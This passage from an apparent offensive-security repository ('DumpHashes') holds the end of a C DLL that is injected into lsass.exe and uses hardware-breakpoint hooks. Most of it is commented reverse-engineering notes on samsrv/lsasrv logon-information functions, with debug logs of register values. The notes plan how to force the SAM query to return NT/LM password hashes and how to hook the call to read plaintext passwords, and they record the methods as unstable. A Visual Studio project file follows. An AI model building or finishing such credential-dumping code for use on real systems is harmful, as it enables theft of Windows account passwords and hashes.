 716 | _END_OF_FUNC:
 717 |     if (bHookingLibInit)
 718 |         CleapUpHardwareBreakpointHooking();
 719 | 	if (hMonitorThread)
 720 | 		CloseHandle(hMonitorThread);
 721 | 	if (g_hFoundEvent)
 722 | 		CloseHandle(g_hFoundEvent);
 723 |     return bResults;
 724 | }
 725 | 
 726 | 
 727 | // ======================================================================================================================================================
 728 | 
 729 | #define ACTIVE_IMPLEMENTATION		
 730 | 
 731 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD  dwReason, LPVOID lpReserved) {
 732 | 
 733 |     
 734 |     if (dwReason == DLL_PROCESS_ATTACH)
 735 |     {
 736 |         DBGPRINTF(L"\n\n--------------------------------------------------------------------------------------\n");
 737 |         DBGPRINTF(L"[*] Hello From Lsass.exe: %d\n", GetCurrentProcessId());
 738 | 
 739 | #ifdef ACTIVE_IMPLEMENTATION
 740 |         DisableThreadLibraryCalls((HMODULE)hModule);
 741 |         CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExecStart, NULL, 0x00, NULL);
 742 | #endif 
 743 | 
 744 |     }
 745 |    
 746 |     return TRUE;
 747 | }
 748 | 
 749 | 
 750 | // ======================================================================================================================================================
 751 | 
 752 | 
 753 | 
 754 | /*
 755 | 
 756 | // @ https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1430
 757 | typedef struct _USER_INTERNAL6_INFORMATION
 758 | {
 759 |     USER_ALL_INFORMATION I1;
 760 |     LARGE_INTEGER LastBadPasswordTime;
 761 |     ULONG ExtendedFields;
 762 |     BOOLEAN UPNDefaulted;
 763 |     UNICODE_STRING UPN;
 764 |     PUSER_ALLOWED_TO_DELEGATE_TO_LIST A2D2List;
 765 | } USER_INTERNAL6_INFORMATION, *PUSER_INTERNAL6_INFORMATION;
 766 | 
 767 | 
 768 | 
 769 | // Elements in USER_ALL_INFORMATION are populated based on the USER_ALL_* flags:
 770 | // @ https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1199
 771 | 
 772 | 
 773 | // @ https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1340C1-L1375C48
 774 | typedef struct _USER_ALL_INFORMATION
 775 | {
 776 |     LARGE_INTEGER LastLogon;
 777 |     LARGE_INTEGER LastLogoff;
 778 |     LARGE_INTEGER PasswordLastSet;
 779 |     LARGE_INTEGER AccountExpires;
 780 |     LARGE_INTEGER PasswordCanChange;
 781 |     LARGE_INTEGER PasswordMustChange;
 782 |     UNICODE_STRING UserName;
 783 |     UNICODE_STRING FullName;
 784 |     UNICODE_STRING HomeDirectory;
 785 |     UNICODE_STRING HomeDirectoryDrive;
 786 |     UNICODE_STRING ScriptPath;
 787 |     UNICODE_STRING ProfilePath;
 788 |     UNICODE_STRING AdminComment;
 789 |     UNICODE_STRING WorkStations;
 790 |     UNICODE_STRING UserComment;
 791 |     UNICODE_STRING Parameters;
 792 |     UNICODE_STRING LmPassword;
 793 |     UNICODE_STRING NtPassword;
 794 |     UNICODE_STRING PrivateData;
 795 |     SR_SECURITY_DESCRIPTOR SecurityDescriptor;
 796 |     ULONG UserId;
 797 |     ULONG PrimaryGroupId;
 798 |     ULONG UserAccountControl;
 799 |     ULONG WhichFields;
 800 |     LOGON_HOURS LogonHours;
 801 |     USHORT BadPasswordCount;
 802 |     USHORT LogonCount;
 803 |     USHORT CountryCode;
 804 |     USHORT CodePage;
 805 |     BOOLEAN LmPasswordPresent;
 806 |     BOOLEAN NtPasswordPresent;
 807 |     BOOLEAN PasswordExpired;
 808 |     BOOLEAN PrivateDataSensitive;
 809 | } USER_ALL_INFORMATION, *PUSER_ALL_INFORMATION;
 810 | 
 811 | */
 812 | 
 813 | 
 814 | 
 815 | /*
 816 | __int64 __fastcall @lsasrv!LsapSamExtGetUserLogonInformation2(
 817 |     SAMPR_HANDLE                        DomainHandle,       // RCX 
 818 |     ULONG                               LookupFlags,        // RDX
 819 |     PUNICODE_STRING                     UserName,           // R8
 820 |     ULONG                               WhichFields,        // R9
 821 |     ULONG                               ExtendedFields,     // [RSP+0x28]
 822 | 	PSAM_MAPPED_ATTRIBUTE_SET           MappedAttrSet,      // [RSP+0x30]   
 823 |     PUSER_INTERNAL6_INFORMATION       * UserInfoOut,        // [RSP+0x38]   // OUT
 824 |     PSID_AND_ATTRIBUTES_LIST            LocalMembership,    // [RSP+0x40]   // OUT
 825 |     PSAMPR_HANDLE                       LocalUserHandle     // [RSP+0x48]   // OUT
 826 | )
 827 | {
 828 |     
 829 |     UNREFERENCED_PARAMETER(MappedAttrSet);
 830 | 
 831 |     // Use the global domain handle instead of the one passed in RCX
 832 |     DomainHandle = g_hIdProvExtSamAccountDomain;
 833 | 
 834 |     if (IsSamIDecodeClaimsBlobPresent()) {
 835 |         return @samsrv!SamIGetUserLogonInformation2(
 836 |             DomainHandle,
 837 |             LookupFlags,
 838 |             UserName,
 839 | 			0x1B,                // override WhichFields (explained below)
 840 |             ExtendedFields,
 841 |             UserInfoOut,
 842 |             LocalMembership,
 843 |             LocalUserHandle
 844 |         );
 845 |     }
 846 | 
 847 |     // Otherwise bail out
 848 |     return STATUS_NOT_IMPLEMENTED;
 849 | }
 850 | */
 851 | 
 852 | // =======================================================================================================================================================
 853 | 
 854 | /*
 855 | NTSTATUS @samsrv!SamIGetUserLogonInformation2(
 856 |    SAMPR_HANDLE                    DomainHandle,    // RCX
 857 |    ULONG                           LookupFlags,     // RDX
 858 |    PUNICODE_STRING                 UserName,        // R8
 859 |    ULONG                           WhichFields,     // R9
 860 |    ULONG                           ExtendedFields,  // [RSP+0x28]
 861 |    PUSER_INTERNAL6_INFORMATION*    UserInfo,        // [RSP+0x30]   // OUT
 862 |    PSID_AND_ATTRIBUTES_LIST*       LocalMembership, // [RSP+0x38]   // OUT
 863 |    PSAMPR_HANDLE*                  LocalUserHandle  // [RSP+0x40]   // OUT
 864 | )
 865 | {
 866 | 
 867 |     return @samsrv!SampGetUserLogonInformation(
 868 |         DomainHandle,
 869 |         LookupFlags,
 870 |         UserName,
 871 |         0x1B,                   // override WhichFields (explained below)
 872 |         ExtendedFields,
 873 |         UserInfo,
 874 |         LocalMembership,
 875 |         LocalUserHandle
 876 |     );
 877 | }
 878 | */
 879 | 
 880 | 
 881 | 
 882 | // =======================================================================================================================================================
 883 | 
 884 | /*
 885 | NTSTATUS @samsrv!SampGetUserLogonInformation(
 886 | 	SAMPR_HANDLE                    DomainHandle,    // RCX
 887 | 	ULONG                           LookupFlags,     // RDX
 888 | 	PUNICODE_STRING                 UserName,        // R8
 889 | 	ULONG                           WhichFields,     // R9
 890 | 	ULONG                           ExtendedFields,  // [RSP+0x28]  
 891 | 	PUSER_INTERNAL6_INFORMATION*    UserInfo,        // [RSP+0x30]  // OUT
 892 | 	PSID_AND_ATTRIBUTES_LIST*       LocalMembership, // [RSP+0x38]  // OUT
 893 | 	PSAMPR_HANDLE*                  LocalUserHandle  // [RSP+0x40]  // OUT
 894 | )
 895 | {
 896 | 
 897 |     NTSTATUS           STATUS;
 898 |     UNICODE_STRING     LocalName;
 899 |     PWCHAR             NameBuffer = NULL;
 900 |     SIZE_T             AllocSize;
 901 |     USHORT             NameChars;
 902 |     BOOLEAN            bHeapAllocated = FALSE;
 903 |     ULONG              DsrmBehavior;
 904 |     BOOLEAN            bIsDsRunning;
 905 | 
 906 |     // 1) Check service state 
 907 |     if (g_SampServiceState != 2) 
 908 |     {
 909 |         //
 910 |         // WPP tracing:::WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, DomainHandle, LookupFlags );
 911 |         //
 912 |         return STATUS_INVALID_DOMAIN_STATE; // 0xC00000DC
 913 |     }
 914 | 
 915 |     // 2) Compute how many WCHARs in the incoming UserName 
 916 |     NameChars = UserName->Length / sizeof(WCHAR);
 917 |     AllocSize = (NameChars + 1) * sizeof(WCHAR);
 918 |     AllocSize = (AllocSize + 0xF) & ~0xF;           // Round up to 16-byte
 919 | 
 920 | 	// 3) Allocate a temporary buffer for the name
 921 |     NameBuffer = (PWCHAR)_alloca(AllocSize);
 922 | 	if (NameBuffer == NULL) 
 923 |     {
 924 |         NameBuffer = g_pfnAllocate(AllocSize);
 925 | 		if (NameBuffer == NULL) 
 926 |         {
 927 |             //
 928 |             // WPP tracing::: WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, LookupFields );
 929 |             //
 930 | 			return STATUS_INSUFFICIENT_RESOURCES;   // 0xC0000017
 931 | 		}
 932 |         bHeapAllocated = TRUE;
 933 | 	}
 934 | 
 935 | 
 936 |      RtlCopyMemory(NameBuffer, UserName->Buffer, UserName->Length);
 937 | 	 NameBuffer[NameChars] = L'\0';
 938 | 
 939 | 	 // 4) Initialize the UNICODE_STRING structure
 940 | 	 LocalName.Length           = (USHORT)UserName->Length;
 941 | 	 LocalName.MaximumLength    = (USHORT)AllocSize;
 942 | 	 LocalName.Buffer           = NameBuffer;
 943 | 
 944 | 
 945 | 	 // 5) Validate the SAM context handle
 946 |      STATUS = SampValidateContext(DomainHandle);
 947 | 	 if (!NT_SUCCESS(STATUS)) 
 948 |      {
 949 |         //
 950 |         // WPP tracing::: WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, STATUS );
 951 |         //
 952 | 		goto _END_OF_FUNC;
 953 |      }
 954 | 
 955 | 	 // 6) Check if the DS is available
 956 | 	 if (SampUseDsData) 
 957 |      {
 958 |         DsrmBehavior = SampDsrmAdminBehavior;
 959 | 
 960 |         // if DsrmBehavior == 0 (use DS), or == 1 AND DS is up, then DS mode
 961 | 
 962 |         if (DsrmBehavior == 0 || ( DsrmBehavior == 1 && (bIsDsRunning = SampDsIsRunning(), bIsDsRunning) ) )
 963 |         {
 964 |             // increment active-threads count
 965 |             STATUS = SampIncrementActiveThreads();
 966 |             if (!NT_SUCCESS(STATUS)) 
 967 |             {
 968 |                 //
 969 |                 // WPP tracing::: WPP_SF_D( TRACE_LEVEL_WARNING, TraceGUIDs, STATUS );
 970 |                 //
 971 |                 goto _END_OF_FUNC;
 972 |             
 973 |             }
 974 | 
 975 |             //
 976 |             // --- dynamic DS-extension dispatch ---
 977 |             // DomainHandle embeds a domain-index at offset 0xC8; 
 978 |             // use it to find our DS-extension vtable entry.
 979 |             //
 980 |             // ULONG uIdx = *(ULONG*)((BYTE*)DomainHandle + 0xC8);
 981 |             // PSAMP_DEFINED_DOMAIN pSamDefDomain = &SampDefinedDomains[uIdx];
 982 |             
 983 |             // STATUS = pSamDefDomain->DsExtension->GetUserLogonInformation(
 984 | 			// STATUS = SampExtGetUserLogonInformationDs(
 985 |             
 986 |             //               DomainHandle,
 987 |             //               LookupFlags,
 988 |             //               &LocalName,
 989 |             //               WhichFields,
 990 |             //               ExtendedFields,
 991 |             //               UserInfo,
 992 |             //               LocalMembership,
 993 |             //               LocalUserHandle
 994 |             //          );
 995 |             //
 996 | 
 997 |             // decrement thread count
 998 |             SampDecrementActiveThreads();
 999 |         }
1000 |         else 
1001 |         {
1002 |             // DS is unavailable 
1003 |             STATUS = STATUS_DS_UNAVAILABLE;      // 0xC0000064
1004 |             //
1005 |             // WPP tracing::: WPP_SF_D( TRACE_LEVEL_ERROR, TraceGUIDs, STATUS );
1006 |             //    
1007 |         }
1008 |     }
1009 |     else 
1010 |     {
1011 |         // 7) Registry-mode helper
1012 |         STATUS = SampGetUserLogonInformationRegistryMode(
1013 |                      DomainHandle,
1014 |                      LookupFlags,
1015 |                      ExtendedFields,
1016 |                      UserInfo,
1017 |                      LocalMembership,
1018 |                      LocalUserHandle
1019 |                  );
1020 |     }
1021 | 
1022 | _END_OF_FUNC:
1023 | 	if (bHeapAllocated) 
1024 |     {
1025 | 		g_pfnFree(NameBuffer);
1026 | 	}
1027 | 	return STATUS;
1028 | }
1029 | */
1030 | 
1031 | /*
1032 | 
1033 | #define USER_ALL_BASIC_INFO_MASK  \
1034 |     (USER_ALL_USERNAME       | \
1035 |      USER_ALL_FULLNAME       | \
1036 |      USER_ALL_PRIMARYGROUPID | \
1037 |      USER_ALL_ADMINCOMMENT)
1038 | 
1039 | 
1040 | -> Windows is forcing the WhichFields to be 0x1B (USER_ALL_BASIC_INFO_MASK) in the @samsrv!SamIGetUserLogonInformation2 and @lsasrv!LsapSamExtGetUserLogonInformation2 functions
1041 | -> USER_ALL_BASIC_INFO_MASK is not defined in ntsam.h (its defined above - you can see why its 'basic')
1042 | -> Maybe set WhichFields to USER_ALL_READ_TRUSTED_MASK2:
1043 |    USER_ALL_READ_TRUSTED_MASK2 = USER_ALL_READ_TRUSTED_MASK (https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1275C9-L1275C36) + USER_ALL_OWFPASSWORD
1044 | -> However, to set WhichFields, we need to make sure that whoever populates the domain handle 
1045 |    (which is set to g_hIdProvExtSamAccountDomain by @lsasrv!LsapSamExtGetUserLogonInformation2)  
1046 |    Is given the enough access to use USER_ALL_READ_TRUSTED_MASK2
1047 | -> USER_ALL_READ_TRUSTED_MASK2 is defined below:
1048 | 
1049 | #define USER_ALL_READ_TRUSTED_MASK2 \
1050 |     (USER_ALL_NTPASSWORDPRESENT | \
1051 |     USER_ALL_LMPASSWORDPRESENT | \
1052 |     USER_ALL_OWFPASSWORD | \
1053 |     USER_ALL_PASSWORDEXPIRED | \
1054 |     USER_ALL_SECURITYDESCRIPTOR | \
1055 |     USER_ALL_PRIVATEDATA)
1056 | 
1057 | */
1058 | 
1059 | 
1060 | 
1061 | /*
1062 | -> g_hIdProvExtSamAccountDomain is populated by two functions in lsasrv.dll
1063 | 
1064 | 
1065 | 1. LsapLazyInitSamConnection
1066 | 
1067 |     // .....
1068 | 
1069 |     loc_180027A7E:
1070 |     lea     rax, ?g_IdProvExtDomainSid@@3PEAXEA ; void * g_IdProvExtDomainSid
1071 |     mov     r8d, 2000000h   ; unsigned int
1072 |     mov     [rsp+48h+var_18], rax ; void **
1073 |     lea     r9, ?g_hIdProvExtSamAccountDomain@@3PEAXEA ; void **
1074 |     and     [rsp+48h+var_20], 0
1075 |     lea     rdx, ?g_hIdProvExtSamServer@@3PEAXEA ; void **
1076 |     mov     cl, 1           ; unsigned __int8
1077 |     mov     [rsp+48h+var_28], r8d ; unsigned int
1078 |     call    ?LsapOpenLocalSamHandles@@YAJEPEAPEAXK0K00@Z ; LsapOpenLocalSamHandles(uchar,void * *,ulong,void * *,ulong,void * *,void * *)
1079 |     mov     ebx, eax
1080 |     test    eax, eax
1081 |     jns     short loc_180027AC6
1082 | 
1083 | 
1084 |     // .....
1085 | 
1086 | 
1087 | 2. LsapFindConnectedUserByLocalName
1088 | 
1089 | 	// .....
1090 | 	mov     rax, [rsp+48h+var_28]
1091 | 	mov     r8d, 2000000h   ; unsigned int
1092 | 	lea     r9, ?g_hIdProvExtSamAccountDomain@@3PEAXEA ; void **
1093 | 	and     [rsp+48h+var_20], 0
1094 | 	lea     rdx, ?g_hIdProvExtSamServer@@3PEAXEA ; void **
1095 | 	mov     cl, 1           ; unsigned __int8
1096 | 	call    ?LsapOpenLocalSamHandles@@YAJEPEAPEAXK0K00@Z ; LsapOpenLocalSamHandles(uchar,void * *,ulong,void * *,ulong,void * *,void * *)
1097 | 	mov     ebx, eax
1098 | 	test    eax, eax
1099 | 	jns     short loc_180027AC6
1100 | 	// .....
1101 | 
1102 | 
1103 | -> Both of these functions are calling LsapOpenLocalSamHandles like this:
1104 | 
1105 | LsapOpenLocalSamHandles(
1106 |     flags,                        ; CL = provider index (0x1 for built-in SAM)
1107 |     &g_hIdProvExtSamServer,       ; RDX = out server handle
1108 |     0x02000000,                   ; R8  = DesiredServerAccess
1109 |     &g_hIdProvExtSamAccountDomain,; R9  = out domain handle
1110 |     0x02000000,                   ; [rsp] = DesiredDomainAccess
1111 |     &g_IdProvExtDomainSid,        ; [rsp+8] = out domain SID
1112 |     NULL                          ; [rsp+12] = out SID length
1113 | )
1114 | 
1115 | -> 0x02000000 is MAXIMUM_ALLOWED (not sure), so maybe we can already set it to USER_ALL_READ_TRUSTED_MASK2 instead of the forced USER_ALL_BASIC_INFO_MASK
1116 | */
1117 | 
1118 | 
1119 | 
1120 | 
1121 | 
1122 | 
1123 | /*
1124 | @1 Compiled with PRINT_CTX
1125 | @2 Get-Content C:\DummyDebug.log -Encoding Unicode | Where-Object { $_ -match '\[i\] Thread Context|\[i\] R9:' }
1126 | 
1127 | 
1128 | [i] Thread Context [ #1 ]:
1129 | [i] R9: 0x0000000000000004
1130 | [i] Thread Context [ #2 ]:
1131 | [i] R9: 0x0000000000000004
1132 | [i] Thread Context [ #3 ]:
1133 | [i] R9: 0x0000000000000004
1134 | [i] Thread Context [ #4 ]:
1135 | [i] R9: 0x0000000000000004
1136 | [i] Thread Context [ #5 ]:
1137 | [i] R9: 0x0000000000000004
1138 | [i] Thread Context [ #6 ]:
1139 | [i] R9: 0x0000000000000004
1140 | [i] Thread Context [ #7 ]:
1141 | [i] R9: 0x0000000023000000
1142 | [i] Thread Context [ #8 ]:
1143 | [i] R9: 0x00000000000003C0
1144 | [i] Thread Context [ #9 ]:
1145 | [i] R9: 0x0000000000100004
1146 | [i] Thread Context [ #10 ]:
1147 | [i] R9: 0x0000000000000004
1148 | [i] Thread Context [ #11 ]:
1149 | [i] R9: 0x0000000000000004
1150 | [i] Thread Context [ #12 ]:
1151 | [i] R9: 0x0000000000000004
1152 | [i] Thread Context [ #13 ]:
1153 | [i] R9: 0x0000000000000004
1154 | [i] Thread Context [ #14 ]:
1155 | [i] R9: 0x0000000000000004
1156 | [i] Thread Context [ #15 ]:
1157 | [i] R9: 0x0000000000000004
1158 | [i] Thread Context [ #16 ]:
1159 | [i] R9: 0x0000000000000004
1160 | [i] Thread Context [ #17 ]:
1161 | [i] R9: 0x0000000000000004
1162 | [i] Thread Context [ #18 ]:
1163 | [i] R9: 0x0000000000000004
1164 | [i] Thread Context [ #19 ]:
1165 | [i] R9: 0x0000000023000000
1166 | [i] Thread Context [ #20 ]:
1167 | [i] R9: 0x00000000000003C0
1168 | [i] Thread Context [ #21 ]:
1169 | [i] R9: 0x0000000000100004
1170 | [i] Thread Context [ #22 ]:
1171 | [i] R9: 0x0000000000000004
1172 | [i] Thread Context [ #23 ]:
1173 | [i] R9: 0x0000000000000004
1174 | [i] Thread Context [ #24 ]:
1175 | [i] R9: 0x0000000000000004
1176 | 
1177 | -> These values correspond to the following:
1178 | 
1179 | 1. 0x0000000000000004 = USER_ALL_USERID
1180 | 2. 0x0000000023000000 = USER_ALL_NTPASSWORDPRESENT  | USER_ALL_LMPASSWORDPRESENT  | USER_ALL_OWFPASSWORD 
1181 | 3. 0x00000000000003C0 = USER_ALL_HOMEDIRECTORY  | USER_ALL_HOMEDIRECTORYDRIVE  | USER_ALL_SCRIPTPATH  | USER_ALL_PROFILEPATH
1182 | 4. 0x0000000000100004 = USER_ALL_NTPASSWORDPRESENT  | USER_ALL_USERID 
1183 | 
1184 | -> All are forced to be 0x1B 
1185 | -> However, we can force set 'WhichFields' to be USER_ALL_READ_TRUSTED_MASK2 when its passed as 0x0000000023000000
1186 | -> USER_ALL_READ_TRUSTED_MASK2 is equal to 0x3F000000
1187 | 
1188 | @3 Get-Content C:\DummyDebug.log -Encoding Unicode | Where-Object { $_ -match '\[i\] Thread Context|\[i\] Rdx:' }
1189 | 
1190 | [i] Thread Context [ #1 ]:
1191 | [i] Rdx: 0x0000000000004000
1192 | [i] Thread Context [ #2 ]:
1193 | [i] Rdx: 0x0000000000000000
1194 | [i] Thread Context [ #3 ]:
1195 | [i] Rdx: 0x0000000000004000
1196 | [i] Thread Context [ #4 ]:
1197 | [i] Rdx: 0x0000000000004000
1198 | [i] Thread Context [ #5 ]:
1199 | [i] Rdx: 0x0000000000004000
1200 | [i] Thread Context [ #6 ]:
1201 | [i] Rdx: 0x0000000000004000
1202 | [i] Thread Context [ #7 ]:
1203 | [i] Rdx: 0x0000000000004000
1204 | [i] Thread Context [ #8 ]:
1205 | [i] Rdx: 0x0000000000004000
1206 | [i] Thread Context [ #9 ]:
1207 | [i] Rdx: 0x0000000000008000
1208 | [i] Thread Context [ #10 ]:
1209 | [i] Rdx: 0x0000000000000080
1210 | [i] Thread Context [ #11 ]:
1211 | [i] Rdx: 0x0000000000000080
1212 | [i] Thread Context [ #12 ]:
1213 | [i] Rdx: 0x0000000000000080
1214 | [i] Thread Context [ #13 ]:
1215 | [i] Rdx: 0x0000000000000080
1216 | [i] Thread Context [ #14 ]:
1217 | [i] Rdx: 0x0000000000000080
1218 | [i] Thread Context [ #15 ]:
1219 | [i] Rdx: 0x0000000000004000
1220 | [i] Thread Context [ #16 ]:
1221 | [i] Rdx: 0x0000000000004000
1222 | [i] Thread Context [ #17 ]:
1223 | [i] Rdx: 0x0000000000004000
1224 | [i] Thread Context [ #18 ]:
1225 | [i] Rdx: 0x0000000000004000
1226 | [i] Thread Context [ #19 ]:
1227 | [i] Rdx: 0x0000000000004000
1228 | [i] Thread Context [ #20 ]:
1229 | [i] Rdx: 0x0000000000004000
1230 | [i] Thread Context [ #21 ]:
1231 | [i] Rdx: 0x0000000000008000
1232 | [i] Thread Context [ #22 ]:
1233 | [i] Rdx: 0x0000000000000080
1234 | [i] Thread Context [ #23 ]:
1235 | [i] Rdx: 0x0000000000000080
1236 | [i] Thread Context [ #24 ]:
1237 | [i] Rdx: 0x0000000000000080
1238 | 
1239 | @4 Get-Content C:\DummyDebug.log -Encoding Unicode | Where-Object { $_ -match '\[i\] Thread Context|\[i\] Rsi:' }
1240 | 
1241 | [i] Thread Context [ #1 ]:
1242 | [i] Rsi: 0x0000000000004000
1243 | [i] Thread Context [ #2 ]:
1244 | [i] Rsi: 0x0000000000000001
1245 | [i] Thread Context [ #3 ]:
1246 | [i] Rsi: 0x00007FFCBCE33D20
1247 | [i] Thread Context [ #4 ]:
1248 | [i] Rsi: 0x00007FFCBCE33D20
1249 | [i] Thread Context [ #5 ]:
1250 | [i] Rsi: 0x00007FFCBCE33D20
1251 | [i] Thread Context [ #6 ]:
1252 | [i] Rsi: 0x00007FFCBCE33D20
1253 | [i] Thread Context [ #7 ]:
1254 | [i] Rsi: 0x00007FFCBCE33D20
1255 | [i] Thread Context [ #8 ]:
1256 | [i] Rsi: 0x00007FFCBCE33D20
1257 | [i] Thread Context [ #9 ]:
1258 | [i] Rsi: 0x000000EBE167D5C8
1259 | [i] Thread Context [ #10 ]:
1260 | [i] Rsi: 0x00007FFCBCE33D20
1261 | [i] Thread Context [ #11 ]:
1262 | [i] Rsi: 0x00007FFCBCE33D20
1263 | [i] Thread Context [ #12 ]:
1264 | [i] Rsi: 0x00007FFCBCE33D20
1265 | [i] Thread Context [ #13 ]:
1266 | [i] Rsi: 0x00007FFCBCE33D20
1267 | [i] Thread Context [ #14 ]:
1268 | [i] Rsi: 0x00007FFCBCE33D20
1269 | [i] Thread Context [ #15 ]:
1270 | [i] Rsi: 0x00007FFCBCE33D20
1271 | [i] Thread Context [ #16 ]:
1272 | [i] Rsi: 0x00007FFCBCE33D20
1273 | [i] Thread Context [ #17 ]:
1274 | [i] Rsi: 0x00007FFCBCE33D20
1275 | [i] Thread Context [ #18 ]:
1276 | [i] Rsi: 0x00007FFCBCE33D20
1277 | [i] Thread Context [ #19 ]:
1278 | [i] Rsi: 0x00007FFCBCE33D20
1279 | [i] Thread Context [ #20 ]:
1280 | [i] Rsi: 0x00007FFCBCE33D20
1281 | [i] Thread Context [ #21 ]:
1282 | [i] Rsi: 0x000000EBE13FD858
1283 | [i] Thread Context [ #22 ]:
1284 | [i] Rsi: 0x00007FFCBCE33D20
1285 | [i] Thread Context [ #23 ]:
1286 | [i] Rsi: 0x00007FFCBCE33D20
1287 | [i] Thread Context [ #24 ]:
1288 | [i] Rsi: 0x00007FFCBCE33D20
1289 | */
1290 | 
1291 | 
1292 | /*
1293 | @ NOTE: Remember that SamIGetUserLogonInformation2 is a wrapper for SampGetUserLogonInformation. 
1294 | 
1295 | @ RESULT:
1296 | -> Failure when forcing the 'WhichFields' parameter in SampGetUserLogonInformation. The function will return STATUS_INVALID_INFO_CLASS (0xC0000003)
1297 | 
1298 | @ SUBSTITUTION (1):
1299 | -> At the start of SamIGetUserLogonInformation2, hook and read:
1300 | * R8            // Username                     | dt _UNICODE_STRING @r8
1301 | * R8 + 0x10     // ??                           | dt _UNICODE_STRING @r8+0x10
1302 | * R8 + 0x20     // Workstaion                   | dt _UNICODE_STRING @r8+0x20    
1303 | * R8 + 0x30     // Password                     | dt _UNICODE_STRING @r8+0x30
1304 | -> Only read when SampGetUserLogonInformation's RSI and RDX are 0x4000. Because this is a 'Dry-Run' (Password have a higher chance of existing at the mentioned offset).
1305 | -> On this 'Dry-Run' SampGetUserLogonInformation returns 0xC0000073 (STATUS_NONE_MAPPED)
1306 | 
1307 | @ SUBSTITUTION (2):
1308 | -> At the start of SamIGetUserLogonInformation2, hook and save the pointer to the PUSER_INTERNAL6_INFORMATION structure. 
1309 | -> At the end of SamIGetUserLogonInformation2, hook and read the saved PUSER_INTERNAL6_INFORMATION pointer.
1310 |    
1311 | 
1312 | @ NOTE: Both solutions are not stable.
1313 | 
1314 | @ Requires More Research
1315 | */
1316 | 


--------------------------------------------------------------------------------
/DumpHashes/DumpHashes.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{a93d21b4-2ed6-4f08-bf5a-6e287cf6de20}</ProjectGuid>
 25 |     <RootNamespace>DumpHashes</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |     <ProjectName>Dummy</ProjectName>
 28 |   </PropertyGroup>
 29 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 30 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 31 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 32 |     <UseDebugLibraries>true</UseDebugLibraries>
 33 |     <PlatformToolset>v143</PlatformToolset>
 34 |     <CharacterSet>Unicode</CharacterSet>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v143</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>Unicode</CharacterSet>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 44 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 45 |     <UseDebugLibraries>true</UseDebugLibraries>
 46 |     <PlatformToolset>v143</PlatformToolset>
 47 |     <CharacterSet>Unicode</CharacterSet>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v143</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>Unicode</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
